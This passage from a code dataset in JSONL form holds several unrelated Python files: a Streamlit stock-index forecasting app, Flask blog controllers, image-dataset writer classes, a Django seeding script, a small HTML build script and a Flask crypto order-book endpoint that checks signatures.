go.Figure(data=[go.Table(\n header=dict(values=list(df_filtered.columns)),\n cells=dict(values=[df_filtered.index, df_filtered.Close, df_filtered.Open,\n df_filtered.High, df_filtered.Low, df_filtered.sma_10,\n df_filtered.sma_20,df_filtered.ema_10,df_filtered.ema_20,\n df_filtered.rsi_7, df_filtered.rsi_9, df_filtered.rsi_14]))\n])\n\nfig2.update_layout(\n height=400,\n showlegend=False,\n title_text=\"VN30-Index data table from 2017 to 2023\",\n)\n\n\nst.sidebar.image('bearish-and-bullish-in-stock-market-science-gold-vector-36657484.jpg', width=265)\nst.sidebar.markdown('#### Support tool')\nst.sidebar.markdown('#### VN30-Index data table from 2017 to 2023')\nclick_data = st.sidebar.checkbox('Click here to show out all of historical data of VN30-Index', value=False)\nif click_data:\n st.plotly_chart(fig2, theme=\"streamlit\", use_container_width=True)\n##############################################################################################\nst.header(\"Report model\")\ncol00, col2, col3, col4, col5 = st.columns(5)\nwith col00:\n st.metric(label=\"\", value=\"Label 0\")\nwith col2:\n st.metric(label=\"Precison label 0\", value=\"76%\")\nwith col3:\n st.metric(label=\"Recall label 0\", value=\"67%\")\nwith col4:\n st.metric(label=\"F1-score\", value=\"71%\")\nwith col5:\n st.metric(label=\"Support\", value=\"142\")\n\ncol01, col6, col7, col8, col9 = st.columns(5)\nwith col01:\n st.metric(label=\"\", value=\"Label 1\")\nwith col6:\n st.metric(label=\"Precison label 1\", value=\"74%\")\nwith col7:\n st.metric(label=\"Recall label 1\", value=\"81%\")\nwith col8:\n st.metric(label=\"F1-score\", value=\"77%\")\nwith col9:\n st.metric(label=\"Support\", value=\"161\")\n\ncol13, col1, col10, col11, col12 = st.columns(5)\nwith col10:\n st.metric(label=\"Accuracy\", value=\"75%\")\nwith col11:\n st.metric(label=\"F1-score\", value=\"75%\")\nwith col12:\n st.metric(label=\"Support\", value=\"303\") \n\nimport datetime\n\n# d = st.date_input(\n# \"When\\'s your birthday\",\n# datetime.date(2019, 7, 6))\n# st.write('Your birthday is:', d)\n\n\n# cold1, cold2 = st.columns(2)\n# with cold1:\n# d = st.date_input(\n# \"Start: \",\n# datetime.date(2019, 7, 6))\n# with cold2:\n# d2 = st.date_input(\n# \"End: \",\n# datetime.date(2023, 4, 4))\nst.header(\"Forcasting display\")\n########################################################################\nselect_event = st.sidebar.selectbox('#### Methods',\n ['Select','Manual input', 'Upload file','Link Github'])\n\nif select_event == 'Manual input':\n bid_quality = st.sidebar.number_input(\"bid_quality\", value=66774)\n bid_volume = st.sidebar.number_input(\"bid_volume\", value=196533544)\n ask_quality = st.sidebar.number_input(\"ask_quality\", value=58645)\n ask_volume = st.sidebar.number_input(\"ask_volume\", value=199406752)\n matching_volume = st.sidebar.number_input(\"matching_volume\", value=7176062)\n negotiable_volume = st.sidebar.number_input(\"negotiable_volume\", value=100000)\n positive = st.sidebar.number_input(\"positive\", value=1)\n negative = st.sidebar.number_input(\"negative\", value=0)\n SMA_10_lag = st.sidebar.number_input(\"SMA 10 days\", value=630)\n SMA_20_lag = st.sidebar.number_input(\"SMA 20 days\", value=623)\n EMA_10_lag = st.sidebar.number_input(\"EMA 10 days\", value=631)\n EMA_20_lag = st.sidebar.number_input(\"EMA 20 days\", value=626)\n RSI_7d_lag = st.sidebar.number_input(\"RSI 7 days\", value=79)\n RSI_9d_lag = st.sidebar.number_input(\"RSI 9 days\", value=71)\n RSI_14d_lag = st.sidebar.number_input(\"RSI 14 days\", value=61)\n \n res_df = pd.DataFrame({'bid_quality':bid_quality, 'bid_volume':bid_volume, 'ask_quality':ask_quality, 'ask_volume':ask_volume,\n 'matching_volume':matching_volume, 'negotiable_volume':negotiable_volume, 'Positive':positive, 'Negative':negative,\n 'SMA_10':SMA_10_lag, 'SMA_20':SMA_20_lag, 'EMA_10':EMA_10_lag, 'EMA_20':EMA_20_lag, 'RSI_7d':RSI_7d_lag, \n 'RSI_9d':RSI_9d_lag, 'RSI_14d':RSI_14d_lag},index=[\"05-05-2023\"])\n \n input_Data = [bid_quality,bid_volume, ask_quality, ask_volume, matching_volume, negotiable_volume,\n positive, negative, SMA_10_lag, SMA_20_lag, EMA_10_lag, EMA_20_lag, RSI_7d_lag, RSI_9d_lag, RSI_14d_lag] \n pred = scaler.predict([input_Data])\n pred_prob = scaler.predict_proba([input_Data])\n \n if st.sidebar.button('#### Submit data and make prediction'):\n st.sidebar.success('This is a success updating!', icon=\"тЬЕ\")\n progress_text = \"Operation in progress. Please wait.\"\n my_bar = st.progress(0, text=progress_text)\n for percent_complete in range(100):\n time.sleep(0.1)\n my_bar.progress(percent_complete + 1, text=progress_text)\n# with st.spinner('Wait for it...'):\n# time.sleep(2)\n st.header(\"Input data\")\n st.dataframe(res_df,use_container_width=True)\n pred_out(pred)\n df_prob = pd.DataFrame({'Downtrend':pred_prob[:,0], 'Uptrend':pred_prob[:,1]},index=[\"05-05-2023\"])\n df_prob.index = df_prob.index.set_names(\"Probability\")\n st.header(\"Forecasting result\")\n st.dataframe(df_prob,use_container_width=True)\n else:\n with st.spinner('Wait for it...'):\n time.sleep(1)\n st.warning('You do not input neccessary features', icon=\"тЪая╕П\")\n \nelif select_event == 'Upload file':\n sample_df = pd.DataFrame({'Number of buy orders': 66774, 'Buy-orders volume':196533544, 'Number of sell orders':58645, 'Sell-orders volume':199406752,\n 'Order matching volume':107108336, 'Put-through volume':7176062, 'Positive':1, 'Negative':0,\n 'SMA_10':1020, 'SMA_20':1019, 'EMA_10':1020, 'EMA_20':1019, 'RSI_7d':56, \n 'RSI_9d':55, 'RSI_14d':54},index=[\"dd-MM-YY\"])\n if st.sidebar.button('Sample Data'):\n with st.spinner('Wait for it...'):\n time.sleep(2)\n st.write(\"Please upload data like the sample:\")\n st.dataframe(sample_df)\n# st.write(sample_df.columns)\n uploaded_files = st.sidebar.file_uploader(\"Choose a CSV file\")\n if uploaded_files is not None:\n bytes_data = uploaded_files.getvalue()\n# st.sidebar.write(\"filename:\", uploaded_files.name)\n new_data = pd.read_csv(uploaded_files,index_col=0)\n# st.write(new_data) \n X= new_data.iloc[:,:-1]\n X.columns = [\"Number of buy orders\",\"Buy-orders volume\",\"Number of sell orders\",\"Sell-orders volume\",\"Order matching volume\",\"Put-through volume\",\n \"Positive\",\"Negative\",\"SMA_10\",\"SMA_20\",\"EMA_10\",\"EMA_20\",\"RSI_7d\",\"RSI_9d\",\"RSI_14d\"]\n pred_new = scaler.predict(X)\n pred_new_prob = scaler.predict_proba(X)\n \n df_final = pd.DataFrame({\"Predict\":pred_new,\n 'Downtrend':pred_new_prob[:,0], \n 'Uptrend':pred_new_prob[:,1]},index=new_data.index)\n if st.sidebar.button('#### Make prediction'):\n progress_text = \"Operation in progress. Please wait.\"\n my_bar = st.progress(100, text=progress_text)\n for percent_complete in range(100):\n time.sleep(0.1)\n my_bar.progress(percent_complete + 1, text=progress_text)\n st.header(\"Forecasting result\") \n st.dataframe(df_final,use_container_width=True)\n else:\n pass\n else:\n st.warning('You do not input neccessary features', icon=\"тЪая╕П\")\nelif select_event == 'Link Github':\n link_git = st.sidebar.text_input(\"Enter your link here\")\n if link_git == \"\":\n st.warning('You do not input neccessary features', icon=\"тЪая╕П\")\n else:\n# df_link = pd.read_csv('https://raw.githubusercontent.com/BrianNguyen2001/Prediction-VN30/main/cleaned_new_data_datn.csv')\n df_link = pd.read_csv(link_git,index_col=0)\n if st.sidebar.button('#### Make prediction'):\n progress_text = \"Operation in progress. Please wait.\"\n my_bar = st.progress(100, text=progress_text)\n for percent_complete in range(100):\n time.sleep(0.1)\n my_bar.progress(percent_complete + 1, text=progress_text)\n st.header(\"Input data\")\n st.dataframe(df_link,use_container_width=True)\n X= df_link.iloc[:,:-1]\n X.columns = [\"Number of buy orders\",\"Buy-orders volume\",\"Number of sell orders\",\"Sell-orders volume\",\"Order matching volume\",\"Put-through volume\",\n \"Positive\",\"Negative\",\"SMA_10\",\"SMA_20\",\"EMA_10\",\"EMA_20\",\"RSI_7d\",\"RSI_9d\",\"RSI_14d\"]\n pred_new = scaler.predict(X)\n pred_new_prob = scaler.predict_proba(X)\n\n df_final_2 = pd.DataFrame({\"Predict\":pred_new,\n 'Downtrend':pred_new_prob[:,0], \n 'Uptrend':pred_new_prob[:,1]},index=df_link.index)\n st.header(\"Forecasting result\")\n st.dataframe(df_final_2,use_container_width=True)\n else:\n pass\nelif select_event == 'Select':\n pass\n","repo_name":"BrianNguyen2001/Prediction-VN30","sub_path":"streamlit_app.py","file_name":"streamlit_app.py","file_ext":"py","file_size_in_byte":13960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"8006482679","text":"import os\nimport secrets # For creating a random key to save image file\nfrom PIL import Image # Resizing images using pillow module to save space on our filesystem\nfrom flask import Flask, render_template, request, session, url_for, flash, redirect, abort, Response\nfrom flask_login import login_user, current_user, logout_user, login_required # Maintains user session\nfrom flaskblogengine.forms import RegistrationForm, LoginForm, UpdateAccountForm, PostForm # Importing registration and login classes from forms.py\nfrom flaskblogengine.models import User, Post\nfrom flaskblogengine import app, db, bcrypt, es, celery\n# from flask_session import Session\n\n# Session(app)\n\n\n@app.route(\"/\")\ndef home():\n posts = Post.query.all() # Returns list of all records of Post\n posts = posts[::-1] # Reversing a list\n return render_template('home.html', blogs=posts)\n\n\n@app.route(\"/search\", methods=['GET'])\ndef search():\n search_txt = request.args.get('search')\n conf_submit = request.args.get('submit')\n if conf_submit == 'Submit':\n # Searching text in 'post_index' of elasticsearch\n search_list = es.search(index='post_index', doc_type='post_index',\n body = {'query': {'multi_match': {'query': search_txt, 'fields': ['author', 'title', 'content']}}})['hits']['hits']\n\n # flash(search_list, 'danger')\n if search_list:\n flash(f\"Search Result for '{search_txt}'\", 'success')\n return render_template('search-result.html', title='Search Result', results=search_list)\n else:\n flash(\"Your Search Do Not Match Any of Our Records\", 'info')\n return redirect(url_for('home'))\n else:\n flash(\"Please submit to get the results...\", 'danger')\n return redirect(url_for('home'))\n\n\n@celery.task\ndef download_blog(post_id):\n post = Post.query.get_or_404(post_id)\n blog_content = post.title + '\\t\\t' + 'By ' + post.author.username + ' ' + post.date_posted.strftime('%d-%m-%Y') + '\\n\\n' + post.content\n blog_name = post.title.lower().replace(' ', '_') + '.txt'\n return (blog_content, blog_name)\n\n\n@app.route('/post//export')\ndef export(post_id):\n result = download_blog.delay(post_id)\n file_content, file_name = result.wait()\n return Response(file_content, mimetype=\"text/plain\",\n headers={\"Content-Disposition\": \"attachment;filename={}\".format(file_name)})\n\n\n@app.route(\"/about\")\ndef about():\n return render_template('about.html', title='About')\n\n\n@app.route(\"/register\", methods=['GET', 'POST'])\ndef register():\n if current_user.is_authenticated:\n return redirect(url_for('home'))\n form_obj = RegistrationForm()\n if form_obj.validate_on_submit():\n hashed_password = bcrypt.generate_password_hash(form_obj.password.data).decode('utf-8')\n user = User(username=form_obj.username.data, email=form_obj.email.data, password=hashed_password)\n db.session.add(user)\n db.session.commit()\n flash('Your account has been created', 'success') # Flashes a message on submission\n return redirect(url_for('login'))\n return render_template('register.html', title='Register', form=form_obj) # Passing registration object as form\n\n\n@app.route(\"/login\", methods=['GET', 'POST'])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for('home'))\n form_obj = LoginForm()\n if form_obj.validate_on_submit():\n user = User.query.filter_by(email=form_obj.email.data).first()\n\n if user and bcrypt.check_password_hash(user.password, form_obj.password.data):\n login_user(user, remember=form_obj.remember.data)\n # Trying to access a page directly which needs login then it stores the url you are requesting and redirects to the page you are requesting after login.\n next_page = request.args.get('next')\n # flash(f'You have logged in successfully!', 'success') # Flashes a message on submission\n return redirect(next_page) if next_page else redirect(url_for('home'))\n else:\n flash('Incorrect Username or Password!', 'danger')\n return render_template('login.html', title='Login', form=form_obj)\n\n\n@app.route(\"/logout\")\ndef logout():\n logout_user()\n return redirect(url_for(\"home\"))\n\n\ndef save_picture(form_picture):\n random_hex = secrets.token_hex(8) # Creating hex token of 8 bytes\n _, f_ext = os.path.splitext(form_picture.filename) # '_' is used to throw away an unused variable in python\n picture_fn = random_hex + f_ext # creating file name with the given file extension\n picture_full_path = os.path.join(app.root_path, 'static/profile_pics', picture_fn)\n\n output_size = (125, 125)\n new_img = Image.open(form_picture) # Using PIL module here\n new_img.thumbnail(output_size) # Converting the image to 125 X 125px\n\n new_img.save(picture_full_path) # Saving the new converted image\n return picture_fn\n\n\n@app.route(\"/account\", methods=['GET', 'POST'])\n@login_required # This decorator is used to prevent accessing page when trying to access account\ndef account():\n account_form = UpdateAccountForm()\n if account_form.validate_on_submit(): # On submission of account info form we update the database.\n if account_form.picture.data:\n picture_file = save_picture(account_form.picture.data)\n current_user.img_file = picture_file\n current_user.username = account_form.username.data\n current_user.email = account_form.email.data\n db.session.commit()\n flash('Your account has been updated', 'success')\n return redirect(url_for('account'))\n elif request.method == 'GET': # Writing default username and email in the account form\n account_form.username.data = current_user.username\n account_form.email.data = current_user.email\n image_file = url_for('static', filename='profile_pics/' + current_user.img_file)\n return render_template('account.html', title='Account', img_file=image_file, account_form=account_form)\n\n\n@app.route(\"/post/new\", methods=['GET', 'POST'])\n@login_required\ndef new_post():\n new_blog_form = PostForm()\n if new_blog_form.validate_on_submit():\n post = Post(title=new_blog_form.title.data, content=new_blog_form.content.data, author=current_user)\n db.session.add(post)\n db.session.commit()\n es.index(index='post_index', doc_type='post_index', id=post.id, body={'author': post.author.username,\n 'title': post.title,\n 'content': post.content,\n 'date_posted': post.date_posted.strftime('%d-%m-%Y')})\n flash('Your blog has been posted!', 'success')\n return redirect(url_for('home'))\n return render_template('create_post.html', title='New Blog', new_blog_obj=new_blog_form, legend='New Post')\n\n\n@app.route(\"/post/\")\ndef post(post_id):\n post = Post.query.get_or_404(post_id)\n return render_template('blog.html', tiltle=post.title, blog=post)\n\n\n@app.route(\"/post//update\", methods=['GET', 'POST'])\n@login_required\ndef update_post(post_id):\n post = Post.query.get_or_404(post_id)\n if post.author != current_user:\n abort(403)\n form = PostForm()\n if form.validate_on_submit():\n post.title = form.title.data\n post.content = form.content.data\n db.session.commit()\n flash('You Blog has been updated and posted successfully.', 'success')\n return redirect(url_for('post', post_id=post.id))\n elif request.method == 'GET':\n form.title.data = post.title\n form.content.data = post.content\n return render_template('create_post.html', title='Update Blog', new_blog_obj=form, legend='Update Blog')\n\n\n@app.route(\"/post//delete\", methods=['POST'])\n@login_required\ndef delete_post(post_id):\n post = Post.query.get_or_404(post_id)\n if post.author != current_user:\n abort(403)\n es.delete(index='post_index', doc_type='post_index', id=post_id, ignore=['400', '404'])\n # es.indices.delete('post_index') --> Delete the index completely\n db.session.delete(post)\n db.session.commit()\n flash('Your blog has been deleted from our records.')\n return redirect(url_for('home'))\n","repo_name":"niketnishi/flask_blog_engine","sub_path":"flaskblogengine/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":8510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"34728436885","text":"\"\"\"\"writer module handle writing the images to disk\"\"\"\n\nimport json\nimport os\n\nimport fsspec\nimport numpy as np\nimport pyarrow as pa\nimport pyarrow.parquet as pq\nimport webdataset as wds\n\n\nclass BufferedParquetWriter:\n \"\"\"Write samples to parquet files incrementally with a buffer\"\"\"\n\n def __init__(self, output_file, schema, buffer_size=100):\n self.buffer_size = buffer_size\n self.schema = schema\n self._initiatlize_buffer()\n fs, output_path = fsspec.core.url_to_fs(output_file)\n\n self.output_fd = fs.open(output_path, \"wb\")\n self.parquet_writer = pq.ParquetWriter(self.output_fd, schema)\n\n def _initiatlize_buffer(self):\n self.current_buffer_size = 0\n self.buffer = {k: [] for k in self.schema.names}\n\n def _add_sample_to_buffer(self, sample):\n for k in self.schema.names:\n self.buffer[k].append(sample[k])\n self.current_buffer_size += 1\n\n def write(self, sample):\n if self.current_buffer_size >= self.buffer_size:\n self.flush()\n self._add_sample_to_buffer(sample)\n\n def flush(self):\n \"\"\"Write the buffer to disk\"\"\"\n if self.current_buffer_size == 0:\n return\n\n df = pa.Table.from_pydict(self.buffer, self.schema)\n self.parquet_writer.write_table(df)\n self._initiatlize_buffer()\n\n def close(self):\n self.flush()\n if self.parquet_writer is not None:\n self.parquet_writer.close()\n self.parquet_writer = None\n self.output_fd.close()\n\n\nclass ParquetSampleWriter:\n \"\"\"ParquetSampleWriter is a image+caption writer to parquet\"\"\"\n\n def __init__(\n self,\n shard_id,\n output_folder,\n save_caption,\n oom_shard_count,\n schema,\n encode_format,\n ):\n self.oom_shard_count = oom_shard_count\n self.encode_format = encode_format\n schema = schema.append(pa.field(encode_format, pa.binary()))\n shard_name = \"{shard_id:0{oom_shard_count}d}\".format( # pylint: disable=consider-using-f-string\n shard_id=shard_id, oom_shard_count=oom_shard_count\n )\n output_file = f\"{output_folder}/{shard_name}.parquet\"\n self.buffered_parquet_writer = BufferedParquetWriter(output_file, schema, 100)\n self.save_caption = save_caption\n\n def write(self, img_str, key, caption, meta):\n \"\"\"Keep sample in memory then write to disk when close() is called\"\"\"\n if img_str is not None:\n sample = {\"key\": key, self.encode_format: img_str}\n if self.save_caption:\n sample[\"txt\"] = str(caption) if caption is not None else \"\"\n else:\n sample = {\"key\": key, self.encode_format: None}\n if self.save_caption:\n sample[\"txt\"] = None\n sample.update(meta)\n self.buffered_parquet_writer.write(sample)\n\n def close(self):\n self.buffered_parquet_writer.close()\n\n\nclass WebDatasetSampleWriter:\n \"\"\"WebDatasetSampleWriter is a image+caption writer to webdataset\"\"\"\n\n def __init__(\n self,\n shard_id,\n output_folder,\n save_caption,\n oom_shard_count,\n schema,\n encode_format,\n ):\n\n self.oom_shard_count = oom_shard_count\n shard_name = \"{shard_id:0{oom_shard_count}d}\".format( # pylint: disable=consider-using-f-string\n shard_id=shard_id, oom_shard_count=oom_shard_count\n )\n self.shard_id = shard_id\n fs, output_path = fsspec.core.url_to_fs(output_folder)\n \n self.tar_fd = fs.open(f\"{output_path}/{shard_name}.tar\", \"wb\")\n self.tarwriter = wds.TarWriter(self.tar_fd)\n self.save_caption = save_caption\n self.buffered_parquet_writer = BufferedParquetWriter(output_folder + \"/\" + shard_name + \".parquet\", schema, 100)\n self.encode_format = encode_format\n\n def write(self, img_str, key, caption, meta):\n \"\"\"write sample to tars\"\"\"\n if img_str is not None:\n sample = {\"__key__\": key, self.encode_format: img_str}\n if self.save_caption:\n sample[\"txt\"] = str(caption) if caption is not None else \"\"\n # some meta data may not be JSON serializable\n for k, v in meta.items():\n if isinstance(v, np.ndarray):\n meta[k] = v.tolist()\n sample[\"json\"] = json.dumps(meta, indent=4, ensure_ascii=False )\n self.tarwriter.write(sample)\n self.buffered_parquet_writer.write(meta)\n\n def close(self):\n self.buffered_parquet_writer.close()\n self.tarwriter.close()\n self.tar_fd.close()\n\n\nclass FilesSampleWriter:\n \"\"\"FilesSampleWriter is a caption+image writer to files\"\"\"\n\n def __init__(\n self,\n shard_id,\n output_folder,\n save_caption,\n oom_shard_count,\n schema,\n encode_format,\n ):\n self.oom_shard_count = oom_shard_count\n shard_name = \"{shard_id:0{oom_shard_count}d}\".format( # pylint: disable=consider-using-f-string\n shard_id=shard_id, oom_shard_count=oom_shard_count\n )\n self.shard_id = shard_id\n self.fs, self.subfolder = fsspec.core.url_to_fs(f\"{output_folder}/{shard_name}\")\n if not self.fs.exists(self.subfolder):\n self.fs.mkdir(self.subfolder)\n self.save_caption = save_caption\n self.buffered_parquet_writer = BufferedParquetWriter(output_folder + \"/\" + shard_name + \".parquet\", schema, 100)\n self.encode_format = encode_format\n\n def write(self, img_str, key, caption, meta):\n \"\"\"Write sample to disk\"\"\"\n if img_str is not None:\n filename = f\"{self.subfolder}/{key}.{self.encode_format}\"\n with self.fs.open(filename, \"wb\") as f:\n f.write(img_str)\n if self.save_caption:\n caption = str(caption) if caption is not None else \"\"\n caption_filename = f\"{self.subfolder}/{key}.txt\"\n with self.fs.open(caption_filename, \"w\") as f:\n f.write(str(caption))\n\n # some meta data may not be JSON serializable\n for k, v in meta.items():\n if isinstance(v, np.ndarray):\n meta[k] = v.tolist()\n j = json.dumps(meta, indent=4)\n meta_filename = f\"{self.subfolder}/{key}.json\"\n with self.fs.open(meta_filename, \"w\") as f:\n f.write(j)\n self.buffered_parquet_writer.write(meta)\n\n def close(self):\n self.buffered_parquet_writer.close()\n\n\nclass DummySampleWriter:\n \"\"\"Does not write\"\"\"\n\n def __init__(self, shard_id, output_folder, save_caption, oom_shard_count, schema, encode_format):\n pass\n\n def write(self, img_str, key, caption, meta):\n pass\n\n def close(self):\n pass\n","repo_name":"360CVGroup/SEEChat","sub_path":"code/tools_box/img2dataset_tools/writer.py","file_name":"writer.py","file_ext":"py","file_size_in_byte":6870,"program_lang":"python","lang":"en","doc_type":"code","stars":87,"dataset":"github-code","pt":"63"} +{"seq_id":"27861141415","text":" # -*- coding: utf-8 -*-\n# @Time : 19-2-15 下午5:52\n# @Author : SamSa\n# @Email : sajinde@qq.com\n# @File : script.py\n# @statement:\nimport os\nimport random\nimport sys\n\nimport django\n\n\n# 设置环境\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.insert(0,BASE_DIR)\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"Django_Friends.settings\")\ndjango.setup()\n\n\nfrom user.models import User\n\nfrom vip.models import Vip, Permission, VipPerm\n\n\nlast_names = (\n '赵钱孙李周吴郑王冯陈褚卫蒋沈韩杨'\n '朱秦尤许何吕施张孔曹严华金魏陶姜'\n '戚谢邹喻柏水窦章云苏潘葛奚范彭郎'\n '鲁韦昌马苗凤花方俞任袁柳酆鲍史唐'\n '费廉岑薛雷贺倪汤滕殷罗毕郝邬安常'\n '乐于时傅皮卞齐康伍余元卜顾孟平黄'\n)\n\nfirst_names = {\n 'male': [\n '致远', '俊驰', '雨泽', '烨磊', '晟睿',\n '天佑', '文昊', '修洁', '黎昕', '远航',\n '旭尧', '鸿涛', '伟祺', '荣轩', '越泽',\n '浩宇', '瑾瑜', '皓轩', '浦泽', '绍辉',\n '绍祺', '升荣', '圣杰', '晟睿', '思聪'\n ],\n 'female': [\n '沛玲', '欣妍', '佳琦', '雅芙', '雨婷',\n '韵寒', '莉姿', '雨婷', '宁馨', '妙菱',\n '心琪', '雯媛', '诗婧', '露洁', '静琪',\n '雅琳', '灵韵', '清菡', '溶月', '素菲',\n '雨嘉', '雅静', '梦洁', '梦璐', '惠茜'\n ]\n}\n\n\ndef random_name():\n \"\"\"随机生成姓名\"\"\"\n last_name = random.choice(last_names)\n sex = random.choice(list(first_names.keys()))\n first_name = random.choice(first_names[sex])\n\n return ''.join([last_name, first_name]), sex\n\n\ndef create_robots(num):\n \"\"\"创建机器人用户\"\"\"\n for i in range(num):\n name, sex = random_name()\n try:\n User.objects.create(\n sex=sex,\n nickname=name,\n location=random.choice(['bj', 'sh', 'gz', 'sz', 'cd', 'xa', 'wh']),\n birth_year=random.randint(1980,2000),\n birth_month=random.randint(1,12),\n birth_day=random.randint(1,28),\n phonenum=random.randint(21000000000,29000000000))\n print('robot:%s\\t%s'%(name,sex))\n except Exception as e:\n print(e)\n\n\n\ndef init_perm():\n \"\"\"创建权限数据\"\"\"\n permission = (\n ('vipflag', '会员身份标识'),\n ('superlike', '超级喜欢'),\n ('back', '反悔功能'),\n ('anylocation', '任意更改定位'),\n ('unlimit_like', '无限喜欢次数'),\n ('like_me', '查看喜欢过我的人'),\n )\n\n for name, desc in permission:\n perm, _ = Permission.objects.get_or_create(name=name, desc=desc)\n\n print(perm)\n\n\ndef init_vip():\n \"\"\"创建vip数据\"\"\"\n for i in range(4):\n name = '%s级会员' % i\n price = 5 * i\n vip, _ = Vip.objects.get_or_create(name=name, level=i, price=price)\n print(vip.name)\n\n\ndef create_vip_perm():\n \"\"\"创建会员权限关系表\"\"\"\n\n # 获取vip\n vip1 = Vip.objects.get(level=1)\n vip2 = Vip.objects.get(level=2)\n vip3 = Vip.objects.get(level=3)\n\n # 获取权限\n vipflag = Permission.objects.get(name='vipflag')\n superlike = Permission.objects.get(name='superlike')\n back = Permission.objects.get(name='back')\n anylocation = Permission.objects.get(name='anylocation')\n unlimit_like = Permission.objects.get(name='unlimit_like')\n like_me = Permission.objects.get(name='like_me')\n\n # vip1权限\n VipPerm.objects.get_or_create(vip_id=vip1.id, perm_id=vipflag.id)\n VipPerm.objects.get_or_create(vip_id=vip1.id, perm_id=superlike.id)\n\n # 给 VIP 2 分配权限\n VipPerm.objects.get_or_create(vip_id=vip2.id, perm_id=vipflag.id)\n VipPerm.objects.get_or_create(vip_id=vip2.id, perm_id=superlike.id)\n VipPerm.objects.get_or_create(vip_id=vip2.id, perm_id=back.id)\n\n # 给 VIP 3 分配权限\n VipPerm.objects.get_or_create(vip_id=vip3.id, perm_id=vipflag.id)\n VipPerm.objects.get_or_create(vip_id=vip3.id, perm_id=superlike.id)\n VipPerm.objects.get_or_create(vip_id=vip3.id, perm_id=back.id)\n VipPerm.objects.get_or_create(vip_id=vip3.id, perm_id=anylocation.id)\n VipPerm.objects.get_or_create(vip_id=vip3.id, perm_id=unlimit_like.id)\n VipPerm.objects.get_or_create(vip_id=vip3.id, perm_id=like_me.id)\n\n\nif __name__ == '__main__':\n # create_robots(5000)\n # init_vip()\n # init_perm()\n # create_vip_perm()\n pass\n\n","repo_name":"sajinchang/Django_Friends","sub_path":"scripts/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":4537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"16560486303","text":"import sys\r\n\r\ndef make_page(name, source_dir, out_dir):\r\n\ttemplate_file = open(\"template.html\")\r\n\ttext = template_file.read()\r\n\ttemplate_file.close()\r\n\r\n\tscript_format = \"{d}/{n}.js\"\r\n\r\n\tscript_file = open(script_format.format(d = source_dir, n = name))\r\n\tscript = script_file.read()\r\n\r\n\tbody_format = \"{d}/{n}.md\"\r\n\tbody_file = open(body_format.format(d = source_dir, n = name))\r\n\tbody_text = body_file.read().replace(\"`\", \"\\\\`\")\r\n\r\n\tnew_text = text.replace(\"%SCRIPT%\", script).replace(\"%TEXT%\", body_text)\r\n\r\n\tout_format = \"{d}/{n}.html\"\r\n\r\n\tout_file = open(out_format.format(d = out_dir, n = name), \"w\")\r\n\tout_file.write(new_text)\r\n\tout_file.close()\r\n\r\nsource_dir = sys.argv[1]\r\nout_dir = sys.argv[2]\r\n\r\nfor arg in sys.argv[3:]:\r\n\tmake_page(arg, source_dir, out_dir)\r\n","repo_name":"flaminnoraa/js_demos","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"24790258785","text":"from flask import Flask, request, g\nfrom flask_restful import Resource, Api\nfrom sqlalchemy import create_engine, select, MetaData, Table\nfrom flask import jsonify\nimport json\nimport eth_account\nimport algosdk\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.orm import scoped_session\nfrom sqlalchemy.orm import load_only\n\nfrom models import Base, Order, Log\n\nengine = create_engine('sqlite:///orders.db')\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine)\n\napp = Flask(__name__)\n\n\n# These decorators allow you to use g.session to access the database inside the request code\n@app.before_request\ndef create_session():\n g.session = scoped_session(\n DBSession) # g is an \"application global\" https://flask.palletsprojects.com/en/1.1.x/api/#application-globals\n\n\n@app.teardown_appcontext\ndef shutdown_session(response_or_exc):\n g.session.commit()\n g.session.remove()\n\n\n\"\"\"\n-------- Helper methods (feel free to add your own!) -------\n\"\"\"\n\n\ndef log_message(d):\n # Takes input dictionary d and writes it to the Log table\n payload = d['payload']\n log = Log(message=json.dumps(payload))\n return log\n\n\n\"\"\"\n---------------- Endpoints ----------------\n\"\"\"\n\n\n@app.route('/trade', methods=['POST'])\ndef trade():\n if request.method == \"POST\":\n content = request.get_json(silent=True)\n print(f\"content = {json.dumps(content)}\")\n columns = [\"sender_pk\", \"receiver_pk\", \"buy_currency\", \"sell_currency\", \"buy_amount\", \"sell_amount\", \"platform\"]\n fields = [\"sig\", \"payload\"]\n error = False\n for field in fields:\n if not field in content.keys():\n print(f\"{field} not received by Trade\")\n print(json.dumps(content))\n log_message(content)\n return jsonify(False)\n\n error = False\n for column in columns:\n if not column in content['payload'].keys():\n print(f\"{column} not received by Trade\")\n error = True\n if error:\n print(json.dumps(content))\n log_message(content)\n return jsonify(False)\n\n # Your code here\n # Note that you can access the database session using g.session\n check = False\n payload = content['payload']\n payload_text = json.dumps(payload)\n\n platform = payload['platform']\n\n sk = content['sig']\n pk = payload['sender_pk']\n\n if platform == 'Algorand':\n check = algosdk.util.verify_bytes(payload_text.encode('utf-8'), sk, pk)\n elif platform == 'Ethereum':\n return_pk = eth_account.Account.recover_message(eth_account.messages.encode_defunct(text=payload_text),\n signature=sk)\n if pk == return_pk:\n check = True\n\n if check:\n order = Order(\n signature=sk,\n sender_pk=pk,\n receiver_pk=payload['receiver_pk'],\n buy_currency=payload['buy_currency'],\n sell_currency=payload['sell_currency'],\n buy_amount=payload['buy_amount'],\n sell_amount=payload['sell_amount']\n )\n g.session.add(order)\n g.session.commit()\n else:\n log_message(content)\n\n return jsonify(check)\n\n\n@app.route('/order_book')\ndef order_book():\n # Your code here\n # Note that you can access the database session using g.session\n orders = g.session.query(Order).all()\n result = {'data':\n [{'sender_pk': o.sender_pk,\n 'receiver_pk': o.receiver_pk,\n 'buy_currency': o.buy_currency,\n 'sell_currency': o.sell_currency,\n 'buy_amount': o.buy_amount,\n 'sell_amount': o.sell_amount,\n 'signature': o.signature} for o in orders]\n }\n\n return 